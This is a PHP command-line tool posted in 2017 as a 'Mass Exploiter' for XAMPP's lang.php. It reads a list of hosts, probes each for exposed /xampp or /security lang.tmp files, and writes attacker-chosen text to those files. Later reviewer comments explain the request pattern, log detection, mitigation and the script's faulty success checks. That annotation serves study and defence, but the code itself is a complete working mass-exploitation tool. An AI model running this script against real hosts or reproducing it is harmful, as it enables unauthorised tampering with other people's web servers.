choirurrizal

[CLI] Mass Exploiter XAMPP Local Write Access

Dec 15th, 2017 (edited)
  1. <?php
  2. /*
  3. coded by ShinChan - N45HT | 15/12/2017
  4. */
  // Reviewer summary: interactive CLI script. It asks for a file of hosts and a
  // text string; for each host it requests /xampp/lang.tmp and /security/lang.tmp
  // and, if one of them returns HTTP 200, requests lang.php in the same directory
  // with the text as the query string, then fetches lang.tmp again.
  // Detection: that request sequence (lang.tmp, lang.php?<text>, lang.tmp) from a
  // single client is visible in web-server access logs; the script sets no
  // User-Agent and no timeout option on any of its cURL handles.
  // NOTE(review): presumably only hosts that expose the bundled XAMPP /xampp or
  // /security directories to the network answer these requests; limiting those
  // paths to local access, or removing them, is the mitigation to confirm per host.
  //
  // The statement below only prints the tool's banner.
  5. echo "
  6.  ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
  7. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
  8. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
  9. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
  10.   XAMPP Local Write Access Auto Exploiter - coded by ShinChan
  11.  
  12. ";
  13.  
  // Prompt for the path of the host-list file; the line read from STDIN is trimmed.
  14. echo "Input your target list: ";
  15. $list = trim(fgets(STDIN));
  // Prompt for the text that the loop further down appends as the query string.
  16. echo "Input your quote : ";
  // Spaces become underscores first, then htmlspecialchars() entity-encodes the result.
  17. $quote0 = htmlspecialchars(str_replace(" ","_",(trim(fgets(STDIN)))));
  // These two replacements of raw ">" and "<" find nothing to replace, because
  // htmlspecialchars() on the previous line has already turned both into entities.
  18. $quote1 = str_replace(">","_",$quote0);
  19. $quote2 = str_replace("<","_",$quote1);
  // The entity forms are replaced with "_", so $pwn contains no spaces and no
  // angle brackets; other entities produced above (such as "&amp;") are kept.
  // For log review: the query string sent by this script shows underscores where
  // the operator typed spaces or angle brackets.
  20. $quote3 = str_replace("&gt;","_",$quote2);
  21. $pwn = str_replace("&lt;","_",$quote3);
  22.  
  // Read the whole list file into memory in one call. The return values of
  // fopen() and filesize() are not checked, and the handle is not closed in the
  // code shown on this page.
  23. $open = fopen("$list","r");
  24. $size = filesize("$list");
  25. $read = fread($open,$size);
  // Entries are split on CRLF ("\r\n") only; nothing filters blank entries.
  26. $lists = explode("\r\n",$read);
  27.  
  // Blank line on the console before the per-host output starts.
  28. echo "\n";
  29.  
  // Per-host loop. For every entry of $lists: normalise the URL, probe the two
  // lang.tmp locations, and for the first one that answered 200 request lang.php
  // with $pwn as the query string, then read lang.tmp back.
  // For triage: the console output is not proof that a host was modified (see the
  // notes on $cka and on the two identical branches below); confirming a change
  // means inspecting lang.tmp and the access log on the host itself.
  30. foreach($lists as $target){
          // Entries without an http:// or https:// prefix default to plain http.
  31.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
  32.         $targets = "http://$target";
  33.     }else{
  34.         $targets = $target;
  35.     }
  36.    
  37.     echo "Target => $targets\n";
  38.     echo "  [*] Checking Path : ";
  39.    
          // Probe 1: GET /xampp/lang.tmp, following redirects; the body is discarded
          // and only the final HTTP status code is kept.
  40.     $chx = curl_init("$targets/xampp/lang.tmp");
  41.     curl_setopt($chx, CURLOPT_FOLLOWLOCATION, 1);
  42.     curl_setopt($chx, CURLOPT_RETURNTRANSFER, 1);
  43.     curl_exec($chx);
  44.     $httpcodex = curl_getinfo($chx, CURLINFO_HTTP_CODE);
  45.     curl_close($chx);
  46.                    
          // Probe 2: the same request against /security/lang.tmp. Both probes are
          // always sent, whatever the first one returned.
  47.     $chs = curl_init("$targets/security/lang.tmp");
  48.     curl_setopt($chs, CURLOPT_FOLLOWLOCATION, 1);
  49.     curl_setopt($chs, CURLOPT_RETURNTRANSFER, 1);
  50.     curl_exec($chs);
  51.     $httpcodes = curl_getinfo($chs, CURLINFO_HTTP_CODE);
  52.     curl_close($chs);
  53.  
          // Branch A: /xampp/lang.tmp answered 200 (loose comparison on the status code).
  54.     if($httpcodex == 200){
  55.         echo "/xampp/lang.tmp => OK\n";
  56.         echo "  [*] Exploiting Target : ";
              // GET /xampp/lang.php with $pwn as the raw query string.
              // NOTE(review): presumably lang.php stores the query string in
              // lang.tmp - inferred from the page title and the read-back below,
              // not shown in this file.
  57.         $ck = curl_init("$targets/xampp/lang.php?$pwn");
  58.         curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
  59.         curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
  60.         $cka = curl_exec($ck);
              // $cka is truthy for any non-empty response body; the HTTP status of
              // this request is never inspected, and $ck is never closed.
  61.         if($cka){
  62.             echo "OK\n";
  63.             echo "  [*] Result : ";
                  // Read lang.tmp back and look for $pwn in it. $pwn is placed in
                  // the pattern without preg_quote().
  64.             $ch = curl_init("$targets/xampp/lang.tmp");
  65.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  66.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  67.             $cek = curl_exec($ch);
                  // Both branches print the same URL, so the output does not show
                  // whether the text was actually found in lang.tmp.
  68.             if(preg_match("/$pwn/",$cek)){
  69.                 echo "$targets/xampp/lang.tmp\n\n";
  70.             }else{
  71.                 echo "$targets/xampp/lang.tmp\n\n";
  72.             }
  73.             curl_close($ch);
  74.         }else{
  75.             echo "Failed\n\n";
  76.         }
          // Branch B: only reached when branch A's check failed and
          // /security/lang.tmp answered 200; same steps against /security/.
  77.     }else if($httpcodes == 200){
  78.         echo "/security/lang.tmp => OK\n";
  79.         echo "  [*] Exploiting Target : ";
  80.         $ck = curl_init("$targets/security/lang.php?$pwn");
  81.         curl_setopt($ck, CURLOPT_FOLLOWLOCATION, 1);
  82.         curl_setopt($ck, CURLOPT_RETURNTRANSFER, 1);
  83.         $cka = curl_exec($ck);
              // As in branch A: any non-empty body counts, and $ck is left open.
  84.         if($cka){
  85.             echo "OK\n";
  86.             echo "  [*] Result : ";
  87.             $ch = curl_init("$targets/security/lang.tmp");
  88.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  89.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  90.             $cek = curl_exec($ch);
                  // Again both branches print the same URL regardless of the match.
  91.             if(preg_match("/$pwn/",$cek)){
  92.                 echo "$targets/security/lang.tmp\n\n";
  93.             }else{
  94.                 echo "$targets/security/lang.tmp\n\n";
  95.             }
  96.             curl_close($ch);
  97.         }else{
                  // Prints one newline here, where branch A prints two.
  98.             echo "Failed\n";
  99.         }
          // Neither lang.tmp probe returned 200: the host is reported as not
          // vulnerable and no lang.php request is made.
  100.     }else{
  101.         echo "Not Vuln\n\n";
  102.     }
  103. }